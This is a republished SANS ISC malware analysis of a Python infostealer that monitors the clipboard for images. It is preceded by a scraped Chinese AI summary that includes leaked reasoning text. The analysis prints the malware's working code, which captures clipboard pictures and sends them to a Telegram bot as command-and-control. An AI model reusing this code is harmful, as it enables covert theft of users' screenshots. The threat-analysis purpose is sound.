好的,我现在需要帮用户总结一篇文章的内容,控制在100字以内。用户要求直接写描述,不需要开头。首先,我得仔细阅读文章内容,理解主要信息。 文章主要讲的是剪贴板被恶意软件监控的风险。特别是提到了一个Python信息窃取器,它能抓取剪贴板中的图片,并通过Telegram发送出去。此外,代码中还出现了越南语的错误提示信息,这可能暗示作者的背景或目标用户。 接下来,我需要提取关键点:剪贴板监控、图片窃取、Telegram通信、低检测率(VT分数低)、以及代码中的越南语。这些是文章的核心内容。 然后,我要把这些点浓缩成一句话,确保不超过100字。要注意用词简洁明了,同时涵盖所有重要信息。 最后,检查一下是否符合用户的要求:中文总结、直接描述、不使用特定开头。确保没有遗漏重要细节,并且语言流畅自然。 </think> 文章讨论了剪贴板监控的风险,特别是恶意软件通过剪贴板窃取图片数据并通过Telegram发送的情况,并展示了相关代码和样本分析,揭示了此类攻击的技术细节和潜在威胁。 2025-10-15 05:41:49 Author: isc.sans.edu(查看原文) 阅读量:14 收藏
For a while, clipboard content has been monitored by many infostealers. Purposes can be multiple, like simply searching and exfiltrating juicy data or on-the-fly modification like crypto-wallet swapping[1]. Note that the clipboard is a major risk when you don't disable clipboard sharing between your virtual machines and hosts. A malware running in a sandbox will access your (host) clipboard without problem!
The clipboard does not only carry text. Today, we use the clipboard to manipulate a lot of "binary data". After plain text, the most common data types are pictures! We take pictures every time and share them through the clipboard! Who has never grabbed pieces of screens like this? This is convenient when writing reports, documentation, or for archiving purposes.
I spotted a Python infostealer that pays attention to pictures exchanged with the clipboard. It's pretty easy to implement because the ImageGrab library has this feature built in [2]. Here is the piece of code implemented in the malware:
img = ImageGrab.grabclipboard()
if isinstance(img, Image.Image):
img_bytes = io.BytesIO()
img.save(img_bytes, format='PNG')
img_hash = hashlib.md5(img_bytes.getvalue()).hexdigest()
if img_hash != prev_clip_img_hash:
img_path = "clipboard_img.png"
img.save(img_path, "PNG")
send_image(img_path)
prev_clip_img_hash = img_hash
Telegram is used for C2 communications:
def send_image(image_path):
if not bot_active or not os.path.exists(image_path):
logging.warning(f"[send_image] T?p không t?n t?i: {image_path}")
return
try:
with open(image_path, "rb") as photo:
url = f"https://api.telegram.org/bot{TOKEN}/sendDocument"
files = {"document": photo}
data = {"chat_id": CHAT_ID}
response = requests.post(url, files=files, data=data)
if response.status_code != 200:
logging.error(f"[send_image] L?i g?i ?nh: {response.text}")
except Exception as e:
logging.error(f"[send_image] G?i ?nh l?i: {e}")
Note the presence of Vietnamese text ("T?p không t?n t?i" means "File not found"). The file (SHA256:7c70f53ff1e05ee104403784f42819adb1e445c9d97b82cff72a986d59619959) has a low VT score (5/64)[3].
[1] https://isc.sans.edu/diary/MultiCryptocurrency+Clipboard+Swapper/28574
[2] https://pillow.readthedocs.io/en/stable/reference/ImageGrab.html#PIL.ImageGrab.grabclipboard
[3] https://www.virustotal.com/gui/file/7c70f53ff1e05ee104403784f42819adb1e445c9d97b82cff72a986d59619959/detection
Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key
如有侵权请联系:admin#unsafe.sh